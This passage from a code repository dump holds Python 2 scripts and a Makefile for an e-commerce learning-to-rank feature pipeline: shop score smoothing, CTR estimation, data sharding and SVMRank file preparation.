self.pid_day_uv)\n\t\t\t\tself.readUV(\"../data/temp_data/uv_w_%s\" % curday, self.pid_week_uv)\n\t\t\t\tself.readUV(\"../data/temp_data/uv_m_%s\" % curday, self.pid_month_uv)\n\t\t\t\tself.getProductInfo(search_log_file)\n\t\t\tself.readProductInfo(search_log_file,n_features)\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\t\n\n\ndef getSpecifiedDay(curday, n):\n\t'''\n\tget the n days ago\n\t'''\n\ttry:\n\t\tarray = curday.split('-')\n\t\tif len(array) != 3:\n\t\t\treturn\n\t\tyear = int(array[0])\n\t\tmonth = int(array[1])\n\t\tday = int(array[2])\n\t\tpreday = datetime.datetime(year, month, day) - datetime.timedelta(n)\n\t\treturn preday.strftime(\"%Y-%m-%d\")\n\texcept Exception ,ex:\n\t\tprint 'get preday error~~'\n\t\traise ex\n\treturn\n\ndef str2float(f_str):\n\tval = 0\n\ttry:\n\t\tval = float(f_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\t\t\t\ndef str2int(i_str):\n\tval = 0\n\ttry:\n\t\tval = int(i_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\n\ndef main():\n\to = ProductInfo()\n\to.run()\n\nif __name__==\"__main__\":\n\tmain()\n\n\n" }, { "alpha_fraction": 0.6042327880859375, "alphanum_fraction": 0.6179894208908081, "avg_line_length": 21.404762268066406, "blob_id": "a578a926dd31ab9174e445c5232763be874b2bd1", "content_id": "9ff9464bfd83f4965efa6d1d7a72dbeb1d0680c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 945, "license_type": "no_license", "max_line_length": 76, "num_lines": 42, "path": "/bin/set_thrift_server_data.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "\nimport sys\n\nclass SetThriftData():\n\tdef __init__(self):\n\t\tself.job_name = \"thrift data\"\n\n\tdef saveData(self, srcfilepath, dispath):\n\t\tsrcfile = None\n\t\tdisfile_array = None\n\t\ttry:\n\t\t\tsrcfile = open(srcfilepath, 'r')\n\t\t\tdisfile_array = [open('%s%s' % (dispath, i), 'w+') for i in range(10000)]\n\t\t\twhile True:\n\t\t\t\tline = srcfile.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tpid = int(array[0])\n\t\t\t\tindex = pid%10000\n\t\t\t\tdisfile_array[index].write(line)\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif srcfile:\n\t\t\t\tsrcfile.close()\n\t\t\tif disfile_array:\n\t\t\t\tfor i in range(len(disfile_array)):\n\t\t\t\t\tif disfile_array[i]:\n\t\t\t\t\t\tdisfile_array[i].close()\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\treturn\n\tcurday = sys.argv[1]\t\n\tsrcfilepath = \"../data/product_info_%s\" % curday\n\tdispath = \"../data/thrift_data/temp_data_\"\n\to = SetThriftData()\n\to.saveData(srcfilepath, dispath)\n\nif __name__==\"__main__\":\n\tmain()\t\t\t\n" }, { "alpha_fraction": 0.5095056891441345, "alphanum_fraction": 0.5209125280380249, "avg_line_length": 11.476190567016602, "blob_id": "108dd21aa3872265593b124e59e9303e9e22bf06", "content_id": "2a1f01c9510b0b27023e622427ebac7193976397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 263, "license_type": "no_license", "max_line_length": 33, "num_lines": 21, "path": "/bin/Makefile", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "CC = g++ \nINCLUDE =\nBIN = \nLIB =\n \nCFLAGS = -D_GNU_SOURCE -Wall -g \n\nLDFLAGS = \nTARGET = map2hashmap\n\t\t\nall: $(TARGET)\n\t\t\n$(TARGET):map2staticmap.o\n\t$(CC) -o $@ $^ $(LIB)\n\t\t\n%.o : %.cpp\n\t$(CC) -c $(CFLAGS) $< $(INCLUDE)\n\t\t\nclean :\n\t$(RM) *.o\n\t$(RM) map2hashmap \n" }, { "alpha_fraction": 0.661282479763031, "alphanum_fraction": 0.6693587303161621, "avg_line_length": 25.852174758911133, "blob_id": "dfb235ccb09348467038c4afcbe4cedcc411a548", "content_id": "33e5abc22b2581a420f44e0befb4ff19f9ca5c08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6191, "license_type": "no_license", "max_line_length": 84, "num_lines": 230, "path": "/bin/get_shop_info.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf-8\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\nimport re\nimport time, datetime\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nimport logging\nimport logging.config\nfrom mail_sender import MailSender\nfrom data_access_object import DataObject\nfrom db_factory import DBFactory\n\nclass ShopInfo(object):\n\tdef __init__(self, conf_path = '..'):\n\t\t'''\n\t\tinit\n\t\t'''\n\t\t#db redis config file position\n\t\tself.conncfg = '%s/conf/connect.cfg' % (conf_path)\n\t\t#log config file\n\t\tself.logcfg = '%s/conf/logger.conf' % (conf_path)\n\t\tlogging.config.fileConfig(self.logcfg)\n\t\tself.logger = logging.getLogger('log')\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t#sql config file\n\t\tself.sqlcfg = '%s/conf/sql.cfg' % (conf_path)\n\t\tself.config = RawConfigParser()\n\t\tself.config.read(self.conncfg)\n\t\tself.sqlfig = RawConfigParser()\n\t\tself.sqlfig.read(self.sqlcfg)\n\t\t#connect db redis\n\t\tself.conn_shop_db = self.connDbserver('com_shop_review')\n\t\tself.sql = self.sqlfig.get('select', 'select_shop_info')\t\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\n\t\t#dict\n\t\tself.shopid_info_score = {}\n\t\tself.shopid_price_score = {}\n\t\tself.shopid_payment_score = {}\n\t\tself.shopid_deliver_score = {}\n\t\tself.shopid_package_score = {}\n\t\tself.shopid_average_score = {}\n\t\t\n\t\t#shop average score\n\t\tself.shopid_scores = {}\n\t\t\n\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef connDbserver(self, section):\n\t\tdbserver = None\n\t\ttry:\n\t\t\tdbtype = self.config.get(section, 'dbtype')\n\t\t\thost = self.config.get(section, 'host')\n\t\t\tport = self.config.get(section, 'port')\n\t\t\tuser = self.config.get(section, 'user')\n\t\t\tpassword = self.config.get(section, 'password')\n\t\t\tdatabase = self.config.get(section, 'database')\n\t\t\tdbserver = DBFactory.Connect(dbtype = dbtype, host = host, database = database, \\\n\t\t\t\t\tcharset = 'utf8',user = user, password = password, port = port)\n\t\texcept Exception, ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\treturn dbserver\n\n\tdef getShopInfo(self, curday):\n\t\tsql = self.sql % curday\n\t\ttry:\n\t\t\tself.conn_shop_db.execute(sql)\n\t\t\twhile True:\n\t\t\t\tline = self.conn_shop_db.fetchmany(10000)\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tfor i in range(len(line)):\n\t\t\t\t\tarray = line[i]\n\t\t\t\t\tshopid = array[0]\n\t\t\t\t\tself.addInfoScore(shopid, array[1])\n\t\t\t\t\tself.addPriceScore(shopid, array[2])\n\t\t\t\t\tself.addPaymentScore(shopid, array[3])\n\t\t\t\t\tself.addDeliverScore(shopid, array[4])\n\t\t\t\t\tself.addPackageScore(shopid, array[5])\n\t\t\t\t\tself.addAverageScore(shopid, array[6])\t\t\t\t\t\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\tfinally:\n\t\t\tif self.conn_shop_db:\n\t\t\t\tself.conn_shop_db.close()\n\t\n\tdef addInfoScore(self, shopid, score):\n\t\tself.addScore(self.shopid_info_score, shopid, score)\n\n\tdef addPriceScore(self, shopid, score):\n\t\tself.addScore(self.shopid_price_score, shopid, score)\n\n\tdef addPaymentScore(self, shopid, score):\n\t\tself.addScore(self.shopid_payment_score, shopid, score)\n\n\tdef addDeliverScore(self, shopid, score):\n\t\tself.addScore(self.shopid_deliver_score, shopid, score)\n\n\tdef addPackageScore(self, shopid, score):\n\t\tself.addScore(self.shopid_package_score, shopid, score)\n\n\tdef addAverageScore(self, shopid, score):\n\t\tself.addScore(self.shopid_average_score, shopid, score)\n\n\tdef addScore(self, dt, shopid, score):\n\t\tif dt == None:\n\t\t\tdt = {}\n\t\t\n\t\tif shopid not in dt:\n\t\t\tdt[shopid] = [0 for i in range(6)]\n\t\t\n\t\tif score == None or score < 0:\n\t\t\tscore = 0\n\t\tif score > 5:\n\t\t\tscore = 5\n\t\t\n\t\tscore = int(score)\t\t\n\t\tdt[shopid][score] += 1\n\t\t\t\t\n\n\tdef updataShopAllScore(self):\n\t\t'''\n\t\tcaculate all item socre's expectation for each shopid\n\t\t'''\n\t\tself.updateShopEachScores(self.shopid_info_score, \"info\")\n\t\tself.updateShopEachScores(self.shopid_price_score, \"price\")\n\t\tself.updateShopEachScores(self.shopid_payment_score, \"payment\")\n\t\tself.updateShopEachScores(self.shopid_deliver_score, \"deliver\")\n\t\tself.updateShopEachScores(self.shopid_package_score, \"package\")\n\t\tself.updateShopEachScores(self.shopid_average_score, \"average\")\t\t\n\n\tdef updateShopEachScores(self, dt, index):\n\t\t'''\n\t\tcaculate each score_item's expectation for each shopid \n\t\t'''\n\t\tE_score = 0\n\t\tn_sum = 0\n\t\tfor shopid, s_info in dt.items():\n\t\t\tE_score = 0\n\t\t\tn_sum = 0\n\t\t\tfor i in range(len(s_info)):\n\t\t\t\tn_sum += s_info[i]\n\t\t\t\tE_score += i*s_info[i]\n\t\t\t\n\t\t\tif n_sum == 0:\n\t\t\t\tE_score = 0\n\t\t\telse:\n\t\t\t\tE_score = E_score/(1.0*n_sum) \n\t\t\t\n\t\t\tR = 3.0\n\t\t\tc = 30\n\t\t\tE_score = (n_sum*E_score + c*R)/(n_sum + c)\n\t\t\tE_score\t= round(E_score, 2)\t\n\t\n\t\t\tif shopid not in self.shopid_scores:\n\t\t\t\tself.shopid_scores[shopid] = {}\n\n\t\t\tself.shopid_scores[shopid][index] = E_score\n\n\tdef saveShopScore(self, filepath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(filepath, \"w+\")\n\t\t\tfor shopid, scores in self.shopid_scores.items():\n\t\t\t\tprint shopid, scores\n\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (shopid, scores['info'], \\\n\t\t\t\t\tscores['price'],scores['payment'], scores['deliver'],\\\n\t\t\t\t\tscores['package'], scores['average']))\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef run(self, filepath):\t\n\t\t'''\n\t\t\n\t\t'''\n\t\tcurday = datetime.datetime.now() + datetime.timedelta(days=-30)\n\t\tcurday = curday.strftime('%Y-%m-%d')\t\t\n\t\tprint \"i am here 111\"\t\n\t\tself.getShopInfo(curday)\n\t\tprint \"i am here 2222\"\t\n\t\tself.updataShopAllScore()\n\t\tprint \"i am here 333\"\t\n\t\tself.saveShopScore(filepath)\n\t\tprint \"i am here 444\"\t\n\t\t\n\ndef main():\n\tprint \"go ...\"\n\to = ShopInfo()\n\n\tprint \"run ...\"\n\tfilepath = \"../data/shop_score.txt\"\n\to.run(filepath)\n\n\tprint \"end !\"\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6483979821205139, "alphanum_fraction": 0.6580101251602173, "avg_line_length": 25.123348236083984, "blob_id": "dbbea418917b829de3ef183d8685bbefd3eab873", "content_id": "99d3aad4d02891071b325943e04233e6f5287225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5930, "license_type": "no_license", "max_line_length": 80, "num_lines": 227, "path": "/bin/caculate_features_for_model.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport math\nfrom ConfigParser import RawConfigParser\nfrom ConfigParser import *\n\nsys.path.append('../lib')\nsys.path.append('lib')\nimport logging \nimport logging.config\nfrom mail_sender import MailSender\n\nclass CaculateFeatures4Model():\n\tdef __init__(self, conf_path = '..', feature_num = 18):\n\t\tself.feature_num = feature_num\n\t\t#other config such as email recivers\n\t\tself.filecfg = '%s/conf/main.cfg' % (conf_path)\n\t\tself.fileconfig = RawConfigParser()\n\t\tself.fileconfig.read(self.filecfg)\n\t\t# config email info\n\t\tself.mail_recivers = self.setMailReceiver('email', 'receiver')\n\t\tself.mail_sender = MailSender()\n\n\t\tself.feature_index = {}\n\t\tself.classify_index = {}\n\t\tself.weight_index = {}\n\t\tself.weight_value = {}\n\t\tself.product_info = {}\n\t\tself.product_norm_info = {}\n\t\tself.setFeatureAndClassifyIndex()\n\n\tdef setMailReceiver(self,section = 'email', part = 'receiver'):\n\t\temail_list = self.fileconfig.get(section,part).split(',')\n\t\tmail_receiver = []\n\t\tlenght = len(email_list)\n\t\tfor i in range(lenght):\n\t\t\temail = email_list[i].strip(' ')\n\t\t\tif email == '':\n\t\t\t\tcontinue\n\t\t\tmail_receiver.append(email)\n\t\treturn mail_receiver\n\n\tdef setFeatureAndClassifyIndex(self, section=\"index\"):\n\t\tfeature_list = self.fileconfig.get(section,\"feature_index\").strip().split(',')\n\t\tlenght = len(feature_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = feature_list[i].strip().split(':')\n\t\t\tfeature_index = int(array[0])\n\t\t\tfeature_name = array[1].strip()\n\t\t\tself.feature_index[feature_index] = feature_name\n\n\t\tclassify_list = self.fileconfig.get(section,\"classify_index\").split(',')\n\t\tlenght = len(classify_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = classify_list[i].strip().split(':')\n\t\t\tclassify_index = int(array[0])\n\t\t\tclassify_name = array[1].strip()\n\t\t\tself.classify_index[classify_name] = classify_index\n\n\t\tweight_list = self.fileconfig.get(section,\"weight_index\").split(',')\n\t\tlenght = len(weight_list)\n\t\tfor i in range(lenght):\n\t\t\tarray = weight_list[i].strip().split(':')\n\t\t\tweight_index = int(array[0])\n\t\t\tweight_name = array[1].strip()\n\t\t\tself.weight_index[weight_index] = weight_name\n\n\tdef initWeights(self, filepath):\n\t\tfile = None\n\t\ttry:\n\t\t\tk = 0\n\t\t\tfile = open(filepath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\titem_name = self.weight_index[k]\n\t\t\t#\tprint item_name\n\t\t\t\tself.weight_value[item_name] = float(line.strip())\n\t\t\t\tk += 1\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\t\t\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef normalizedFeature(self, val, max_val = 2209, is_log = True):\n\t\tif val > max_val:\n\t\t\treturn 1\n\t\tif val <= 0:\n\t\t\treturn 0\n\n\t\tif is_log:\n\t\t\tval = math.log(val + 1)\n\t\t\tmax_val = math.log(max_val + 1)\n\t\treturn val/max_val\n\n\tdef loadLogData(self, srcfilepath, disfilepath):\n\t\tsrcfile = None\n\t\tdisfile = None\n\t\ttry:\n\t\t\tsrcfile = open(srcfilepath, \"r\")\n\t\t\tdisfile = open(disfilepath, \"w+\")\n\t\t\tdefault_ctr = 1.0/(1 + math.exp(- self.weight_value['bias']))\n\t\t\tdisfile.write(\"%s\\t%s\\n\" % (-1, default_ctr))\n\t\t\twhile True:\n\t\t\t\tline = srcfile.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\tarray = line.strip(\"\\n\").split(\"\\t\")\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght != self.feature_num:\n\t\t\t\t\tcontinue\n\n\t\t\t\tpid = str2int(array[0])\n\t\t\t\tpid_feature = {}\n\t\t\t\tfor i in range(1, self.feature_num):\n\t\t\t\t\titem_name = self.feature_index[i - 1]\n\t\t\t\t\tval = round(str2float(array[i]), 3)\n\t\t\t\t\tpid_feature[item_name] = val\n\t\t\t\n\t\t\t\tpid_process_feature = self.featureProcess(pid_feature)\n\t\t\t\tpid, ctr = self.estimateCTR(pid, pid_process_feature)\n\t\t#\t\tself.product_info[pid] = pid_feature\n\t\t#\t\tself.product_norm_info[pid] = pid_process_feature\n\t\t\t\t\t\t\n\t\t\t\tdisfile.write(\"%s\\t%s\\n\" % (pid, ctr))\n\t\texcept Exception,ex:\n\t\t\tself.logger.error(ex)\n\t\t\tprint 'Can not connect to dbserver'\n\t\t\tself.mail_sender.sendMail(self.mail_recivers)\n\t\t\traise Exception, ex\n\t\tfinally:\n\t\t\tif srcfile:\n\t\t\t\tsrcfile.close()\n\t\t\tif disfile:\n\t\t\t\tdisfile.close()\n\n\tdef featureProcess(self, pid_feature):\t\n\t\tpid_processed_feature = {}\n\n\t\tis_new = str2int(pid_feature['is_new'])\n\t\tpid_processed_feature['is_new'] = is_new\t\t\n\n\t\tis_promo = str2int(pid_feature['is_discount'])\n\t\tpid_processed_feature['is_discount'] = is_promo\n\n\t\tscore = str2float(pid_feature['score'])\n\t\tif score >= 8:\n\t\t\tscore = 1\n\t\telse:\n\t\t\tscore = 0\n\t\tpid_processed_feature['score'] = score\n\n\t\td_uv = self.normalizedFeature(pid_feature['d_uv'], 50, False)\n\t\tpid_processed_feature['d_uv'] = d_uv\n\n\t\tw_uv = self.normalizedFeature(pid_feature['w_uv'])\n\t\tpid_processed_feature['w_uv'] = w_uv\n\n\t\tm_uv = self.normalizedFeature(pid_feature['m_uv'])\n\t\tpid_processed_feature['m_uv'] = m_uv\n\n\t\tn_comm = self.normalizedFeature(pid_feature['review_total'])\n\t\tpid_processed_feature['review_total'] = n_comm\n\n\t\tn_keep = self.normalizedFeature(pid_feature['n_keep'])\t\t\n\t\tpid_processed_feature['n_keep'] = n_keep\n\n\t\treturn pid_processed_feature\n\n\n\tdef estimateCTR(self, pid, pid_feature_dt):\n\t\tctr = self.weight_value['bias']\n\t\tfor k,w in self.weight_value.items():\n\t\t\tif k == 'bias':\n\t\t\t\tcontinue\n\t\t\tfeature_val = 0\n\t\t\tif k in pid_feature_dt:\n\t\t\t\tfeature_val = pid_feature_dt[k]\n\t\t\tctr += w*feature_val\n\t\treturn pid, 1.0/(1 + math.exp(0 - ctr))\n\n\tdef run(self, weightpath, srcfilepath, disfilepath):\n\t\tself.initWeights(weightpath)\n\t\t#print self.weight_value\n\t\tself.loadLogData(srcfilepath, disfilepath)\n\t\t\ndef str2float(f_str):\n\tval = 0\n\ttry:\n\t\tval = float(f_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\n\ndef str2int(i_str):\n\tval = 0\n\ttry:\n\t\tval = int(i_str)\n\t\tif val < 0:\n\t\t\tval = 0\n\texcept:\n\t\tval = 0\n\treturn val\t\n\n\ndef main():\n\tif len(sys.argv) != 2:\n\t\treturn\n\tcurday = sys.argv[1]\n\tweightpath = \"../data/model.txt\"\n\tsrcfilepath = \"../data/product_info_%s\" % curday\n\tdisfilepath = \"../data/pid_ctr\"\n\to = CaculateFeatures4Model()\n\to.run(weightpath, srcfilepath, disfilepath)\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.5661393404006958, "alphanum_fraction": 0.5792662501335144, "avg_line_length": 21.49242401123047, "blob_id": "6a037f7bc6cf5600813f699c47bd0b1c7d04a7a5", "content_id": "6610c22f43c7c37a9d5a027e5021137730f8ab8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2971, "license_type": "no_license", "max_line_length": 73, "num_lines": 132, "path": "/bin/process_show_click_data.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "\n\nclass CalShowClick():\n\tdef __init__(self):\n\t\tself.query_click = {}\n\t\tself.query_show = {}\n\t\tself.query_position = {}\n\t\tself.query_searchtime = {}\n\n\tdef getClickData(self, srcpath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tarray = line.strip().split('\\t')\n\t\t\t\tquery = array[0].replace(\" \",\"\").replace(\"\\t\", \"\").replace(\"\\n\", \"\");\n\t\t\t\tdict_pid_click = {}\n\t\t\t\tfor i in range(1, len(array)):\n\t\t\t\t\tpid_click_str = array[i].strip().split(':')\n\t\t\t\t\tif len(pid_click_str) != 2:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tpid = str2int(pid_click_str[0])\n\t\t\t\t\tn_click = str2int(pid_click_str[1])\n\t\t\t\t\tdict_pid_click[pid] = n_click\n\t\t\t\t\t\n\t\t\t\tif query not in self.query_click:\n\t\t\t\t\tself.query_click[query] = dict_pid_click\n\t\t\t\t#print query\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\n\tdef getShowData(self, srcpath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(srcpath, 'r')\n\t\t\twhile True:\n\t\t\t\tline = file.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\n\t\t\t\tarray = line.strip().split('|')\n\t\t\t\tlenght = len(array)\n\t\t\t\tif lenght < 2:\n\t\t\t\t\tcontinue\n\n\t\t\t\tquery = array[0].replace(\" \",\"\").replace(\"\\t\", \"\");\n\t\t\t\tn_search = array[1]\n\t\t\t\tdict_pid_show = {}\n\t\t\t\tdict_pid_pos = {}\n\t\t\t\tfor i in range(2, lenght):\n\t\t\t\t\ttmp_str = array[i].strip().split(':')\n\t\t\t\t\tif len(tmp_str) != 3:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tpid = str2int(tmp_str[0])\n\t\t\t\t\tpos = str2int(tmp_str[1])\n\t\t\t\t\tn_show = str2int(tmp_str[2])\n\t\t\t\t\tdict_pid_show[pid] = n_show\n\t\t\t\t\tdict_pid_pos[pid] = pos\n\n\t\t\t\tself.query_show[query] = dict_pid_show\n\t\t\t\tself.query_searchtime[query] = n_search\n\t\t\t\tself.query_position[query] = dict_pid_pos\n\t\t\t\t\n\t\t\t\t#print query\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\tdef saveData(self, dispath):\n\t\tfile = None\n\t\ttry:\n\t\t\tfile = open(dispath, \"w+\")\n\t\t\tfor query, pid_show_dict in self.query_show.items():\n\n\t\t\t\tn_search = 0\n\t\t\t\tif query in self.query_searchtime:\n\t\t\t\t\tn_search = self.query_searchtime[query]\n\t\t\t\t\n\t\t\t\tfor pid, n_show in pid_show_dict.items():\n\t\t\t\t\tpos = self.query_position[query][pid]\n\t\t\t\t\tn_click = 0\n\t\t\t\t\tif query in self.query_click:\n\t\t\t\t\t\tif pid in self.query_click[query]:\n\t\t\t\t\t\t\tn_click = self.query_click[query][pid]\n\n\t\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (query,\\\n\t\t\t\t\t\t n_search, pid, pos, n_show, n_click))\n\n\t\texcept Exception,ex:\n\t\t\tprint ex\n\t\tfinally:\n\t\t\tif file:\n\t\t\t\tfile.close()\n\t\t\t\t\n\ndef str2int(i_str):\t \n\tval = 0\t\t\t\t\n\ttry:\t\t\t\t\t\n\t\tval = int(i_str)\t \n\t\tif val < 0:\t\t\t\n\t\t\tval = 0\t\t\t \n\texcept:\t\t\t\t\t \n\t\tval = 0\t\t\t\t\t\n\treturn val\n\n\ndef main():\n\tprint \"go ...\"\n\to = CalShowClick()\n\tshow_filepath = \"../data/show_click_tmp_data/log-20131031_search.clean\"\n\tclick_filepath = \"../data/show_click_tmp_data/search-131031\"\n\tdispath = \"../data/query_data\"\n\tprint \"show time ...\"\n\to.getShowData(show_filepath)\n\tprint \"click time ...\"\n\to.getClickData(click_filepath)\t\n\tprint \"save data ..\"\n\to.saveData(dispath)\n\tprint \"ok !\"\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.617451548576355, "alphanum_fraction": 0.636565089225769, "avg_line_length": 23.385135650634766, "blob_id": "16bd50ac7769db0e8b4081c6ffd31a5cf8b70da7", "content_id": "70f3bbfe20d771d26c7656c4a8dcfc9016500db5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3610, "license_type": "no_license", "max_line_length": 83, "num_lines": 148, "path": "/bin/main.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport time, datetime\n\nfrom get_product_info import ProductInfo\nfrom process_show_click_data import CalShowClick\n\ndef saveData(product_info_obj, show_click_obj, dispath):\n\tfile = None\n\ttry:\n\t\tfile = open(dispath, \"w+\")\n\t\tfor query, pid_show_dict in show_click_obj.query_show.items():\n\n\t\t\tn_search = 0\n\t\t\tif query in show_click_obj.query_searchtime:\n\t\t\t\tn_search = show_click_obj.query_searchtime[query]\n\n\t\t\tfor pid, n_show in pid_show_dict.items():\n\t\t\t\tpos = show_click_obj.query_position[query][pid]\n\t\t\t\tn_click = 0\n\t\t\t\tif query in show_click_obj.query_click:\n\t\t\t\t\tif pid in show_click_obj.query_click[query]:\n\t\t\t\t\t\tn_click = show_click_obj.query_click[query][pid]\n\t\t\t\t\n\t\t\t\tproduct_info = \"0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\\t0\"\n\t\t\t\tif pid in product_info_obj.pid_info:\n\t\t\t\t\tproduct_info = product_info_obj.pid_info[pid]\n\n\t\t\t\tfile.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % (query,\\\n\t\t\t\t\t n_search, pid, pos, n_show, n_click, product_info))\n\n\texcept Exception,ex:\n\t\tprint ex\n\tfinally:\n\t\tif file:\n\t\t\tfile.close()\t\n\n\ndef prepareSVMRankFile(filepath, disfilepath, lenght, feature_num, feature_index):\n\tsrcfile = None\n\tdisfile = None\n\n\tqid = 0\n\tquery_old = None\n\ttry:\n\t\tsrcfile = open(filepath, 'r')\n\t\tdisfile = open(disfilepath, 'a+')\n\t\tflag = 0\n\t\twhile True:\n\t\t\tline = srcfile.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tarray = line.strip('\\n').split(\"\\t\")\n\n\t\t\tif len(array) != feature_num:\n\t\t\t\tcontinue\n\n\t\t\tquery = array[0]\n\t\t\tshow_time = int(array[4])\n\t\t\tclick_time = int(array[5])\n\t\t\t\n\t\t\tif query != query_old:\n\t\t\t\tqid += 1\n\t\t\t\tquery_old = query\n\t\t\t\tflag = 0\n\t\t\t\tif int(array[6]) == 0:\n\t\t\t\t\tflag = 1\n\n\t\t\tif flag == 1:\n\t\t\t\tcontinue\n\n\t\t\t#str = \"%s qid:%s\" % (ctr, qid)\n\t\t\tstr = \"%s %s qid:%s\" % (click_time, show_time, qid)\n\t\t\tfor i in range(lenght):\n\t\t\t\tindex_id = feature_index[i]\n\t\t\t\tstr = \"%s %s:%s\" % (str, i+1, array[index_id])\n\n\t\t\tdisfile.write(\"%s\\n\" % str)\n\texcept Exception,ex:\n\t\tprint ex\n\tfinally:\n\t\tif srcfile:\n\t\t\tsrcfile.close()\n\t\tif disfile:\n\t\t\tdisfile.close()\n\ndef getSpecifiedDay(curday, n):\n\t'''\n\tget the n days ago\n\t'''\n\ttry:\n\t\tarray = curday.split('-')\n\t\tif len(array) != 3:\n\t\t\treturn\n\t\tyear = int(array[0])\n\t\tmonth = int(array[1])\n\t\tday = int(array[2])\n\t\tpreday = datetime.datetime(year, month, day) - datetime.timedelta(n)\n\t\treturn preday.strftime(\"%Y%m%d\")\n\texcept Exception ,ex:\n\t\tprint 'get preday error~~'\n\t\traise ex\n\treturn\n\n\ndef main():\n\t\n\tprint \"go ...\"\n\tdata_path = \"../data\"\n\t\n\tcurday = datetime.datetime.now().strftime('%Y-%m-%d')\n\tcurday = getSpecifiedDay(curday, 1)\n\n\tprint \"product info ...\"\t\n\tproduct_info_obj = ProductInfo()\n\tproduct_info_obj.run()\n\t\n\tprint \"caculate show ...\"\n\tshow_click_obj = CalShowClick()\n\t\n\tshow_filename = \"log-%s_search.clean\" % curday\n\tshow_filepath = \"%s/temp_data/%s\" % (data_path, 